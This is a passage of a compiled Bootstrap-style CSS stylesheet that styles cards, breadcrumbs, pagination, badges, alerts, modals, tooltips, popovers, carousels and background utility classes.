.card-group > .card {
  margin-bottom: 15px;
}

@media (min-width: 576px) {
  .card-group {
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-flow: row wrap;
    flex-flow: row wrap;
  }
  .card-group > .card {
    -webkit-box-flex: 1;
    -ms-flex: 1 0 0%;
    flex: 1 0 0%;
    margin-bottom: 0;
  }
  .card-group > .card + .card {
    margin-left: 0;
    border-left: 0;
  }
  .card-group > .card:first-child {
    border-top-right-radius: 0;
    border-bottom-right-radius: 0;
  }
  .card-group > .card:first-child .card-img-top,
  .card-group > .card:first-child .card-header {
    border-top-right-radius: 0;
  }
  .card-group > .card:first-child .card-img-bottom,
  .card-group > .card:first-child .card-footer {
    border-bottom-right-radius: 0;
  }
  .card-group > .card:last-child {
    border-top-left-radius: 0;
    border-bottom-left-radius: 0;
  }
  .card-group > .card:last-child .card-img-top,
  .card-group > .card:last-child .card-header {
    border-top-left-radius: 0;
  }
  .card-group > .card:last-child .card-img-bottom,
  .card-group > .card:last-child .card-footer {
    border-bottom-left-radius: 0;
  }
  .card-group > .card:only-child {
    border-radius: 0.25rem;
  }
  .card-group > .card:only-child .card-img-top,
  .card-group > .card:only-child .card-header {
    border-top-left-radius: 0.25rem;
    border-top-right-radius: 0.25rem;
  }
  .card-group > .card:only-child .card-img-bottom,
  .card-group > .card:only-child .card-footer {
    border-bottom-right-radius: 0.25rem;
    border-bottom-left-radius: 0.25rem;
  }
  .card-group > .card:not(:first-child):not(:last-child):not(:only-child) {
    border-radius: 0;
  }
  .card-group > .card:not(:first-child):not(:last-child):not(:only-child) .card-img-top,
  .card-group > .card:not(:first-child):not(:last-child):not(:only-child) .card-img-bottom,
  .card-group > .card:not(:first-child):not(:last-child):not(:only-child) .card-header,
  .card-group > .card:not(:first-child):not(:last-child):not(:only-child) .card-footer {
    border-radius: 0;
  }
}

.card-columns .card {
  margin-bottom: 0.75rem;
}

@media (min-width: 576px) {
  .card-columns {
    -webkit-column-count: 3;
    -moz-column-count: 3;
    column-count: 3;
    -webkit-column-gap: 1.25rem;
    -moz-column-gap: 1.25rem;
    column-gap: 1.25rem;
  }
  .card-columns .card {
    display: inline-block;
    width: 100%;
  }
}

.breadcrumb {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -ms-flex-wrap: wrap;
  flex-wrap: wrap;
  padding: 0.75rem 1rem;
  margin-bottom: 1rem;
  list-style: none;
  background-color: #e9ecef;
  border-radius: 0.25rem;
}

.breadcrumb-item + .breadcrumb-item::before {
  display: inline-block;
  padding-right: 0.5rem;
  padding-left: 0.5rem;
  color: #6c757d;
  content: "/";
}

.breadcrumb-item + .breadcrumb-item:hover::before {
  text-decoration: underline;
}

.breadcrumb-item + .breadcrumb-item:hover::before {
  text-decoration: none;
}

.breadcrumb-item.active {
  color: #6c757d;
}

.pagination {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  padding-left: 0;
  list-style: none;
  border-radius: 0.25rem;
}

.page-link {
  position: relative;
  display: block;
  padding: 0.5rem 0.75rem;
  margin-left: -1px;
  line-height: 1.25;
  color: #007bff;
  background-color: #fff;
  border: 1px solid #dee2e6;
}

.page-link:hover {
  color: #0056b3;
  text-decoration: none;
  background-color: #e9ecef;
  border-color: #dee2e6;
}

.page-link:focus {
  z-index: 2;
  outline: 0;
  box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.25);
}

.page-link:not(:disabled):not(.disabled) {
  cursor: pointer;
}

.page-item:first-child .page-link {
  margin-left: 0;
  border-top-left-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}

.page-item:last-child .page-link {
  border-top-right-radius: 0.25rem;
  border-bottom-right-radius: 0.25rem;
}

.page-item.active .page-link {
  z-index: 1;
  color: #fff;
  background-color: #007bff;
  border-color: #007bff;
}

.page-item.disabled .page-link {
  color: #6c757d;
  pointer-events: none;
  cursor: auto;
  background-color: #fff;
  border-color: #dee2e6;
}

.pagination-lg .page-link {
  padding: 0.75rem 1.5rem;
  font-size: 1.25rem;
  line-height: 1.5;
}

.pagination-lg .page-item:first-child .page-link {
  border-top-left-radius: 0.3rem;
  border-bottom-left-radius: 0.3rem;
}

.pagination-lg .page-item:last-child .page-link {
  border-top-right-radius: 0.3rem;
  border-bottom-right-radius: 0.3rem;
}

.pagination-sm .page-link {
  padding: 0.25rem 0.5rem;
  font-size: 0.875rem;
  line-height: 1.5;
}

.pagination-sm .page-item:first-child .page-link {
  border-top-left-radius: 0.2rem;
  border-bottom-left-radius: 0.2rem;
}

.pagination-sm .page-item:last-child .page-link {
  border-top-right-radius: 0.2rem;
  border-bottom-right-radius: 0.2rem;
}

.badge {
  display: inline-block;
  padding: 0.25em 0.4em;
  font-size: 75%;
  font-weight: 700;
  line-height: 1;
  text-align: center;
  white-space: nowrap;
  vertical-align: baseline;
  border-radius: 0.25rem;
}

.badge:empty {
  display: none;
}

.btn .badge {
  position: relative;
  top: -1px;
}

.badge-pill {
  padding-right: 0.6em;
  padding-left: 0.6em;
  border-radius: 10rem;
}

.badge-primary {
  color: #fff;
  background-color: #007bff;
}

.badge-primary[href]:hover, .badge-primary[href]:focus {
  color: #fff;
  text-decoration: none;
  background-color: #0062cc;
}

.badge-secondary {
  color: #fff;
  background-color: #6c757d;
}

.badge-secondary[href]:hover, .badge-secondary[href]:focus {
  color: #fff;
  text-decoration: none;
  background-color: #545b62;
}

.badge-success {
  color: #fff;
  background-color: #28a745;
}

.badge-success[href]:hover, .badge-success[href]:focus {
  color: #fff;
  text-decoration: none;
  background-color: #1e7e34;
}

.badge-info {
  color: #fff;
  background-color: #17a2b8;
}

.badge-info[href]:hover, .badge-info[href]:focus {
  color: #fff;
  text-decoration: none;
  background-color: #117a8b;
}

.badge-warning {
  color: #212529;
  background-color: #ffc107;
}

.badge-warning[href]:hover, .badge-warning[href]:focus {
  color: #212529;
  text-decoration: none;
  background-color: #d39e00;
}

.badge-danger {
  color: #fff;
  background-color: #dc3545;
}

.badge-danger[href]:hover, .badge-danger[href]:focus {
  color: #fff;
  text-decoration: none;
  background-color: #bd2130;
}

.badge-light {
  color: #212529;
  background-color: #f8f9fa;
}

.badge-light[href]:hover, .badge-light[href]:focus {
  color: #212529;
  text-decoration: none;
  background-color: #dae0e5;
}

.badge-dark {
  color: #fff;
  background-color: #343a40;
}

.badge-dark[href]:hover, .badge-dark[href]:focus {
  color: #fff;
  text-decoration: none;
  background-color: #1d2124;
}

.jumbotron {
  padding: 2rem 1rem;
  margin-bottom: 2rem;
  background-color: #e9ecef;
  border-radius: 0.3rem;
}

@media (min-width: 576px) {
  .jumbotron {
    padding: 4rem 2rem;
  }
}

.jumbotron-fluid {
  padding-right: 0;
  padding-left: 0;
  border-radius: 0;
}

.alert {
  position: relative;
  padding: 0.75rem 1.25rem;
  margin-bottom: 1rem;
  border: 1px solid transparent;
  border-radius: 0.25rem;
}

.alert-heading {
  color: inherit;
}

.alert-link {
  font-weight: 700;
}

.alert-dismissible {
  padding-right: 4rem;
}

.alert-dismissible .close {
  position: absolute;
  top: 0;
  right: 0;
  padding: 0.75rem 1.25rem;
  color: inherit;
}

.alert-primary {
  color: #004085;
  background-color: #cce5ff;
  border-color: #b8daff;
}

.alert-primary hr {
  border-top-color: #9fcdff;
}

.alert-primary .alert-link {
  color: #002752;
}

.alert-secondary {
  color: #383d41;
  background-color: #e2e3e5;
  border-color: #d6d8db;
}

.alert-secondary hr {
  border-top-color: #c8cbcf;
}

.alert-secondary .alert-link {
  color: #202326;
}

.alert-success {
  color: #155724;
  background-color: #d4edda;
  border-color: #c3e6cb;
}

.alert-success hr {
  border-top-color: #b1dfbb;
}

.alert-success .alert-link {
  color: #0b2e13;
}

.alert-info {
  color: #0c5460;
  background-color: #d1ecf1;
  border-color: #bee5eb;
}

.alert-info hr {
  border-top-color: #abdde5;
}

.alert-info .alert-link {
  color: #062c33;
}

.alert-warning {
  color: #856404;
  background-color: #fff3cd;
  border-color: #ffeeba;
}

.alert-warning hr {
  border-top-color: #ffe8a1;
}

.alert-warning .alert-link {
  color: #533f03;
}

.alert-danger {
  color: #721c24;
  background-color: #f8d7da;
  border-color: #f5c6cb;
}

.alert-danger hr {
  border-top-color: #f1b0b7;
}

.alert-danger .alert-link {
  color: #491217;
}

.alert-light {
  color: #818182;
  background-color: #fefefe;
  border-color: #fdfdfe;
}

.alert-light hr {
  border-top-color: #ececf6;
}

.alert-light .alert-link {
  color: #686868;
}

.alert-dark {
  color: #1b1e21;
  background-color: #d6d8d9;
  border-color: #c6c8ca;
}

.alert-dark hr {
  border-top-color: #b9bbbe;
}

.alert-dark .alert-link {
  color: #040505;
}

@-webkit-keyframes progress-bar-stripes {
  from {
    background-position: 1rem 0;
  }
  to {
    background-position: 0 0;
  }
}

@keyframes progress-bar-stripes {
  from {
    background-position: 1rem 0;
  }
  to {
    background-position: 0 0;
  }
}

.progress {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  height: 1rem;
  overflow: hidden;
  font-size: 0.75rem;
  background-color: #e9ecef;
  border-radius: 0.25rem;
}

.progress-bar {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-orient: vertical;
  -webkit-box-direction: normal;
  -ms-flex-direction: column;
  flex-direction: column;
  -webkit-box-pack: center;
  -ms-flex-pack: center;
  justify-content: center;
  color: #fff;
  text-align: center;
  background-color: #007bff;
  transition: width 0.6s ease;
}

.progress-bar-striped {
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-size: 1rem 1rem;
}

.progress-bar-animated {
  -webkit-animation: progress-bar-stripes 1s linear infinite;
  animation: progress-bar-stripes 1s linear infinite;
}

.media {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: start;
  -ms-flex-align: start;
  align-items: flex-start;
}

.media-body {
  -webkit-box-flex: 1;
  -ms-flex: 1;
  flex: 1;
}

.list-group {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-orient: vertical;
  -webkit-box-direction: normal;
  -ms-flex-direction: column;
  flex-direction: column;
  padding-left: 0;
  margin-bottom: 0;
}

.list-group-item-action {
  width: 100%;
  color: #495057;
  text-align: inherit;
}

.list-group-item-action:hover, .list-group-item-action:focus {
  color: #495057;
  text-decoration: none;
  background-color: #f8f9fa;
}

.list-group-item-action:active {
  color: #212529;
  background-color: #e9ecef;
}

.list-group-item {
  position: relative;
  display: block;
  padding: 0.75rem 1.25rem;
  margin-bottom: -1px;
  background-color: #fff;
  border: 1px solid rgba(0, 0, 0, 0.125);
}

.list-group-item:first-child {
  border-top-left-radius: 0.25rem;
  border-top-right-radius: 0.25rem;
}

.list-group-item:last-child {
  margin-bottom: 0;
  border-bottom-right-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}

.list-group-item:hover, .list-group-item:focus {
  z-index: 1;
  text-decoration: none;
}

.list-group-item.disabled, .list-group-item:disabled {
  color: #6c757d;
  background-color: #fff;
}

.list-group-item.active {
  z-index: 2;
  color: #fff;
  background-color: #007bff;
  border-color: #007bff;
}

.list-group-flush .list-group-item {
  border-right: 0;
  border-left: 0;
  border-radius: 0;
}

.list-group-flush:first-child .list-group-item:first-child {
  border-top: 0;
}

.list-group-flush:last-child .list-group-item:last-child {
  border-bottom: 0;
}

.list-group-item-primary {
  color: #004085;
  background-color: #b8daff;
}

.list-group-item-primary.list-group-item-action:hover, .list-group-item-primary.list-group-item-action:focus {
  color: #004085;
  background-color: #9fcdff;
}

.list-group-item-primary.list-group-item-action.active {
  color: #fff;
  background-color: #004085;
  border-color: #004085;
}

.list-group-item-secondary {
  color: #383d41;
  background-color: #d6d8db;
}

.list-group-item-secondary.list-group-item-action:hover, .list-group-item-secondary.list-group-item-action:focus {
  color: #383d41;
  background-color: #c8cbcf;
}

.list-group-item-secondary.list-group-item-action.active {
  color: #fff;
  background-color: #383d41;
  border-color: #383d41;
}

.list-group-item-success {
  color: #155724;
  background-color: #c3e6cb;
}

.list-group-item-success.list-group-item-action:hover, .list-group-item-success.list-group-item-action:focus {
  color: #155724;
  background-color: #b1dfbb;
}

.list-group-item-success.list-group-item-action.active {
  color: #fff;
  background-color: #155724;
  border-color: #155724;
}

.list-group-item-info {
  color: #0c5460;
  background-color: #bee5eb;
}

.list-group-item-info.list-group-item-action:hover, .list-group-item-info.list-group-item-action:focus {
  color: #0c5460;
  background-color: #abdde5;
}

.list-group-item-info.list-group-item-action.active {
  color: #fff;
  background-color: #0c5460;
  border-color: #0c5460;
}

.list-group-item-warning {
  color: #856404;
  background-color: #ffeeba;
}

.list-group-item-warning.list-group-item-action:hover, .list-group-item-warning.list-group-item-action:focus {
  color: #856404;
  background-color: #ffe8a1;
}

.list-group-item-warning.list-group-item-action.active {
  color: #fff;
  background-color: #856404;
  border-color: #856404;
}

.list-group-item-danger {
  color: #721c24;
  background-color: #f5c6cb;
}

.list-group-item-danger.list-group-item-action:hover, .list-group-item-danger.list-group-item-action:focus {
  color: #721c24;
  background-color: #f1b0b7;
}

.list-group-item-danger.list-group-item-action.active {
  color: #fff;
  background-color: #721c24;
  border-color: #721c24;
}

.list-group-item-light {
  color: #818182;
  background-color: #fdfdfe;
}

.list-group-item-light.list-group-item-action:hover, .list-group-item-light.list-group-item-action:focus {
  color: #818182;
  background-color: #ececf6;
}

.list-group-item-light.list-group-item-action.active {
  color: #fff;
  background-color: #818182;
  border-color: #818182;
}

.list-group-item-dark {
  color: #1b1e21;
  background-color: #c6c8ca;
}

.list-group-item-dark.list-group-item-action:hover, .list-group-item-dark.list-group-item-action:focus {
  color: #1b1e21;
  background-color: #b9bbbe;
}

.list-group-item-dark.list-group-item-action.active {
  color: #fff;
  background-color: #1b1e21;
  border-color: #1b1e21;
}

.close {
  float: right;
  font-size: 1.5rem;
  font-weight: 700;
  line-height: 1;
  color: #000;
  text-shadow: 0 1px 0 #fff;
  opacity: .5;
}

.close:hover, .close:focus {
  color: #000;
  text-decoration: none;
  opacity: .75;
}

.close:not(:disabled):not(.disabled) {
  cursor: pointer;
}

button.close {
  padding: 0;
  background-color: transparent;
  border: 0;
  -webkit-appearance: none;
}

.modal-open {
  overflow: hidden;
}

.modal {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1050;
  display: none;
  overflow: hidden;
  outline: 0;
}

.modal-open .modal {
  overflow-x: hidden;
  overflow-y: auto;
}

.modal-dialog {
  position: relative;
  width: auto;
  margin: 0.5rem;
  pointer-events: none;
}

.modal.fade .modal-dialog {
  transition: -webkit-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
  transition: transform 0.3s ease-out, -webkit-transform 0.3s ease-out;
  -webkit-transform: translate(0, -25%);
  transform: translate(0, -25%);
}

.modal.show .modal-dialog {
  -webkit-transform: translate(0, 0);
  transform: translate(0, 0);
}

.modal-dialog-centered {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -ms-flex-align: center;
  align-items: center;
  min-height: calc(100% - (0.5rem * 2));
}

.modal-content {
  position: relative;
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-orient: vertical;
  -webkit-box-direction: normal;
  -ms-flex-direction: column;
  flex-direction: column;
  width: 100%;
  pointer-events: auto;
  background-color: #fff;
  background-clip: padding-box;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0.3rem;
  outline: 0;
}

.modal-backdrop {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1040;
  background-color: #000;
}

.modal-backdrop.fade {
  opacity: 0;
}

.modal-backdrop.show {
  opacity: 0.5;
}

.modal-header {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: start;
  -ms-flex-align: start;
  align-items: flex-start;
  -webkit-box-pack: justify;
  -ms-flex-pack: justify;
  justify-content: space-between;
  padding: 1rem;
  border-bottom: 1px solid #e9ecef;
  border-top-left-radius: 0.3rem;
  border-top-right-radius: 0.3rem;
}

.modal-header .close {
  padding: 1rem;
  margin: -1rem -1rem -1rem auto;
}

.modal-title {
  margin-bottom: 0;
  line-height: 1.5;
}

.modal-body {
  position: relative;
  -webkit-box-flex: 1;
  -ms-flex: 1 1 auto;
  flex: 1 1 auto;
  padding: 1rem;
}

.modal-footer {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -ms-flex-align: center;
  align-items: center;
  -webkit-box-pack: end;
  -ms-flex-pack: end;
  justify-content: flex-end;
  padding: 1rem;
  border-top: 1px solid #e9ecef;
}

.modal-footer > :not(:first-child) {
  margin-left: .25rem;
}

.modal-footer > :not(:last-child) {
  margin-right: .25rem;
}

.modal-scrollbar-measure {
  position: absolute;
  top: -9999px;
  width: 50px;
  height: 50px;
  overflow: scroll;
}

@media (min-width: 576px) {
  .modal-dialog {
    max-width: 500px;
    margin: 1.75rem auto;
  }
  .modal-dialog-centered {
    min-height: calc(100% - (1.75rem * 2));
  }
  .modal-sm {
    max-width: 300px;
  }
}

@media (min-width: 992px) {
  .modal-lg {
    max-width: 800px;
  }
}

.tooltip {
  position: absolute;
  z-index: 1070;
  display: block;
  margin: 0;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
  font-style: normal;
  font-weight: 400;
  line-height: 1.5;
  text-align: left;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  white-space: normal;
  line-break: auto;
  font-size: 0.875rem;
  word-wrap: break-word;
  opacity: 0;
}

.tooltip.show {
  opacity: 0.9;
}

.tooltip .arrow {
  position: absolute;
  display: block;
  width: 0.8rem;
  height: 0.4rem;
}

.tooltip .arrow::before {
  position: absolute;
  content: "";
  border-color: transparent;
  border-style: solid;
}

.bs-tooltip-top, .bs-tooltip-auto[x-placement^="top"] {
  padding: 0.4rem 0;
}

.bs-tooltip-top .arrow, .bs-tooltip-auto[x-placement^="top"] .arrow {
  bottom: 0;
}

.bs-tooltip-top .arrow::before, .bs-tooltip-auto[x-placement^="top"] .arrow::before {
  top: 0;
  border-width: 0.4rem 0.4rem 0;
  border-top-color: #000;
}

.bs-tooltip-right, .bs-tooltip-auto[x-placement^="right"] {
  padding: 0 0.4rem;
}

.bs-tooltip-right .arrow, .bs-tooltip-auto[x-placement^="right"] .arrow {
  left: 0;
  width: 0.4rem;
  height: 0.8rem;
}

.bs-tooltip-right .arrow::before, .bs-tooltip-auto[x-placement^="right"] .arrow::before {
  right: 0;
  border-width: 0.4rem 0.4rem 0.4rem 0;
  border-right-color: #000;
}

.bs-tooltip-bottom, .bs-tooltip-auto[x-placement^="bottom"] {
  padding: 0.4rem 0;
}

.bs-tooltip-bottom .arrow, .bs-tooltip-auto[x-placement^="bottom"] .arrow {
  top: 0;
}

.bs-tooltip-bottom .arrow::before, .bs-tooltip-auto[x-placement^="bottom"] .arrow::before {
  bottom: 0;
  border-width: 0 0.4rem 0.4rem;
  border-bottom-color: #000;
}

.bs-tooltip-left, .bs-tooltip-auto[x-placement^="left"] {
  padding: 0 0.4rem;
}

.bs-tooltip-left .arrow, .bs-tooltip-auto[x-placement^="left"] .arrow {
  right: 0;
  width: 0.4rem;
  height: 0.8rem;
}

.bs-tooltip-left .arrow::before, .bs-tooltip-auto[x-placement^="left"] .arrow::before {
  left: 0;
  border-width: 0.4rem 0 0.4rem 0.4rem;
  border-left-color: #000;
}

.tooltip-inner {
  max-width: 200px;
  padding: 0.25rem 0.5rem;
  color: #fff;
  text-align: center;
  background-color: #000;
  border-radius: 0.25rem;
}

.popover {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 1060;
  display: block;
  max-width: 276px;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
  font-style: normal;
  font-weight: 400;
  line-height: 1.5;
  text-align: left;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  white-space: normal;
  line-break: auto;
  font-size: 0.875rem;
  word-wrap: break-word;
  background-color: #fff;
  background-clip: padding-box;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0.3rem;
}

.popover .arrow {
  position: absolute;
  display: block;
  width: 1rem;
  height: 0.5rem;
  margin: 0 0.3rem;
}

.popover .arrow::before, .popover .arrow::after {
  position: absolute;
  display: block;
  content: "";
  border-color: transparent;
  border-style: solid;
}

.bs-popover-top, .bs-popover-auto[x-placement^="top"] {
  margin-bottom: 0.5rem;
}

.bs-popover-top .arrow, .bs-popover-auto[x-placement^="top"] .arrow {
  bottom: calc((0.5rem + 1px) * -1);
}

.bs-popover-top .arrow::before, .bs-popover-auto[x-placement^="top"] .arrow::before,
.bs-popover-top .arrow::after, .bs-popover-auto[x-placement^="top"] .arrow::after {
  border-width: 0.5rem 0.5rem 0;
}

.bs-popover-top .arrow::before, .bs-popover-auto[x-placement^="top"] .arrow::before {
  bottom: 0;
  border-top-color: rgba(0, 0, 0, 0.25);
}

.bs-popover-top .arrow::after, .bs-popover-auto[x-placement^="top"] .arrow::after {
  bottom: 1px;
  border-top-color: #fff;
}

.bs-popover-right, .bs-popover-auto[x-placement^="right"] {
  margin-left: 0.5rem;
}

.bs-popover-right .arrow, .bs-popover-auto[x-placement^="right"] .arrow {
  left: calc((0.5rem + 1px) * -1);
  width: 0.5rem;
  height: 1rem;
  margin: 0.3rem 0;
}

.bs-popover-right .arrow::before, .bs-popover-auto[x-placement^="right"] .arrow::before,
.bs-popover-right .arrow::after, .bs-popover-auto[x-placement^="right"] .arrow::after {
  border-width: 0.5rem 0.5rem 0.5rem 0;
}

.bs-popover-right .arrow::before, .bs-popover-auto[x-placement^="right"] .arrow::before {
  left: 0;
  border-right-color: rgba(0, 0, 0, 0.25);
}

.bs-popover-right .arrow::after, .bs-popover-auto[x-placement^="right"] .arrow::after {
  left: 1px;
  border-right-color: #fff;
}

.bs-popover-bottom, .bs-popover-auto[x-placement^="bottom"] {
  margin-top: 0.5rem;
}

.bs-popover-bottom .arrow, .bs-popover-auto[x-placement^="bottom"] .arrow {
  top: calc((0.5rem + 1px) * -1);
}

.bs-popover-bottom .arrow::before, .bs-popover-auto[x-placement^="bottom"] .arrow::before,
.bs-popover-bottom .arrow::after, .bs-popover-auto[x-placement^="bottom"] .arrow::after {
  border-width: 0 0.5rem 0.5rem 0.5rem;
}

.bs-popover-bottom .arrow::before, .bs-popover-auto[x-placement^="bottom"] .arrow::before {
  top: 0;
  border-bottom-color: rgba(0, 0, 0, 0.25);
}

.bs-popover-bottom .arrow::after, .bs-popover-auto[x-placement^="bottom"] .arrow::after {
  top: 1px;
  border-bottom-color: #fff;
}

.bs-popover-bottom .popover-header::before, .bs-popover-auto[x-placement^="bottom"] .popover-header::before {
  position: absolute;
  top: 0;
  left: 50%;
  display: block;
  width: 1rem;
  margin-left: -0.5rem;
  content: "";
  border-bottom: 1px solid #f7f7f7;
}

.bs-popover-left, .bs-popover-auto[x-placement^="left"] {
  margin-right: 0.5rem;
}

.bs-popover-left .arrow, .bs-popover-auto[x-placement^="left"] .arrow {
  right: calc((0.5rem + 1px) * -1);
  width: 0.5rem;
  height: 1rem;
  margin: 0.3rem 0;
}

.bs-popover-left .arrow::before, .bs-popover-auto[x-placement^="left"] .arrow::before,
.bs-popover-left .arrow::after, .bs-popover-auto[x-placement^="left"] .arrow::after {
  border-width: 0.5rem 0 0.5rem 0.5rem;
}

.bs-popover-left .arrow::before, .bs-popover-auto[x-placement^="left"] .arrow::before {
  right: 0;
  border-left-color: rgba(0, 0, 0, 0.25);
}

.bs-popover-left .arrow::after, .bs-popover-auto[x-placement^="left"] .arrow::after {
  right: 1px;
  border-left-color: #fff;
}

.popover-header {
  padding: 0.5rem 0.75rem;
  margin-bottom: 0;
  font-size: 1rem;
  color: inherit;
  background-color: #f7f7f7;
  border-bottom: 1px solid #ebebeb;
  border-top-left-radius: calc(0.3rem - 1px);
  border-top-right-radius: calc(0.3rem - 1px);
}

.popover-header:empty {
  display: none;
}

.popover-body {
  padding: 0.5rem 0.75rem;
  color: #212529;
}

.carousel {
  position: relative;
}

.carousel-inner {
  position: relative;
  width: 100%;
  overflow: hidden;
}

.carousel-item {
  position: relative;
  display: none;
  -webkit-box-align: center;
  -ms-flex-align: center;
  align-items: center;
  width: 100%;
  transition: -webkit-transform 0.6s ease;
  transition: transform 0.6s ease;
  transition: transform 0.6s ease, -webkit-transform 0.6s ease;
  -webkit-backface-visibility: hidden;
  backface-visibility: hidden;
  -webkit-perspective: 1000px;
  perspective: 1000px;
}

.carousel-item.active,
.carousel-item-next,
.carousel-item-prev {
  display: block;
}

.carousel-item-next,
.carousel-item-prev {
  position: absolute;
  top: 0;
}

.carousel-item-next.carousel-item-left,
.carousel-item-prev.carousel-item-right {
  -webkit-transform: translateX(0);
  transform: translateX(0);
}

@supports ((-webkit-transform-style: preserve-3d) or (transform-style: preserve-3d)) {
  .carousel-item-next.carousel-item-left,
  .carousel-item-prev.carousel-item-right {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.carousel-item-next,
.active.carousel-item-right {
  -webkit-transform: translateX(100%);
  transform: translateX(100%);
}

@supports ((-webkit-transform-style: preserve-3d) or (transform-style: preserve-3d)) {
  .carousel-item-next,
  .active.carousel-item-right {
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
  }
}

.carousel-item-prev,
.active.carousel-item-left {
  -webkit-transform: translateX(-100%);
  transform: translateX(-100%);
}

@supports ((-webkit-transform-style: preserve-3d) or (transform-style: preserve-3d)) {
  .carousel-item-prev,
  .active.carousel-item-left {
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
  }
}

.carousel-control-prev,
.carousel-control-next {
  position: absolute;
  top: 0;
  bottom: 0;
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -ms-flex-align: center;
  align-items: center;
  -webkit-box-pack: center;
  -ms-flex-pack: center;
  justify-content: center;
  width: 15%;
  color: #fff;
  text-align: center;
  opacity: 0.5;
}

.carousel-control-prev:hover, .carousel-control-prev:focus,
.carousel-control-next:hover,
.carousel-control-next:focus {
  color: #fff;
  text-decoration: none;
  outline: 0;
  opacity: .9;
}

.carousel-control-prev {
  left: 0;
}

.carousel-control-next {
  right: 0;
}

.carousel-control-prev-icon,
.carousel-control-next-icon {
  display: inline-block;
  width: 20px;
  height: 20px;
  background: transparent no-repeat center center;
  background-size: 100% 100%;
}

.carousel-control-prev-icon {
  background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' fill='%23fff' viewBox='0 0 8 8'%3E%3Cpath d='M5.25 0l-4 4 4 4 1.5-1.5-2.5-2.5 2.5-2.5-1.5-1.5z'/%3E%3C/svg%3E");
}

.carousel-control-next-icon {
  background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' fill='%23fff' viewBox='0 0 8 8'%3E%3Cpath d='M2.75 0l-1.5 1.5 2.5 2.5-2.5 2.5 1.5 1.5 4-4-4-4z'/%3E%3C/svg%3E");
}

.carousel-indicators {
  position: absolute;
  right: 0;
  bottom: 10px;
  left: 0;
  z-index: 15;
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-pack: center;
  -ms-flex-pack: center;
  justify-content: center;
  padding-left: 0;
  margin-right: 15%;
  margin-left: 15%;
  list-style: none;
}

.carousel-indicators li {
  position: relative;
  -webkit-box-flex: 0;
  -ms-flex: 0 1 auto;
  flex: 0 1 auto;
  width: 30px;
  height: 3px;
  margin-right: 3px;
  margin-left: 3px;
  text-indent: -999px;
  background-color: rgba(255, 255, 255, 0.5);
}

.carousel-indicators li::before {
  position: absolute;
  top: -10px;
  left: 0;
  display: inline-block;
  width: 100%;
  height: 10px;
  content: "";
}

.carousel-indicators li::after {
  position: absolute;
  bottom: -10px;
  left: 0;
  display: inline-block;
  width: 100%;
  height: 10px;
  content: "";
}

.carousel-indicators .active {
  background-color: #fff;
}

.carousel-caption {
  position: absolute;
  right: 15%;
  bottom: 20px;
  left: 15%;
  z-index: 10;
  padding-top: 20px;
  padding-bottom: 20px;
  color: #fff;
  text-align: center;
}

.align-baseline {
  vertical-align: baseline !important;
}

.align-top {
  vertical-align: top !important;
}

.align-middle {
  vertical-align: middle !important;
}

.align-bottom {
  vertical-align: bottom !important;
}

.align-text-bottom {
  vertical-align: text-bottom !important;
}

.align-text-top {
  vertical-align: text-top !important;
}

.bg-primary {
  background-color: #007bff !important;
}

a.bg-primary:hover, a.bg-primary:focus,
button.bg-primary:hover,
button.bg-primary:focus {
  background-color: #0062cc !important;
}

.bg-secondary {
  background-color: #6c757d !important;
}

a.bg-secondary:hover, a.bg-secondary:focus,
button.bg-secondary:hover,
button.bg-secondary:focus {
  background-color: #545b62 !important;
}

.bg-success {
  background-color: #28a745 !important;
}

a.bg-success:hover, a.bg-success:focus,
button.bg-success:hover,
button.bg-success:focus {
  background-color: #1e7e34 !important;
}

.bg-info {
  background-color: #17a2b8 !important;
}

a.bg-info:hover, a.bg-info:focus,
button.bg-info:hover,
button.bg-info:focus {
  background-color: #117a8b !important;
}

.bg-warning {
  background-color: #ffc107 !important;
}

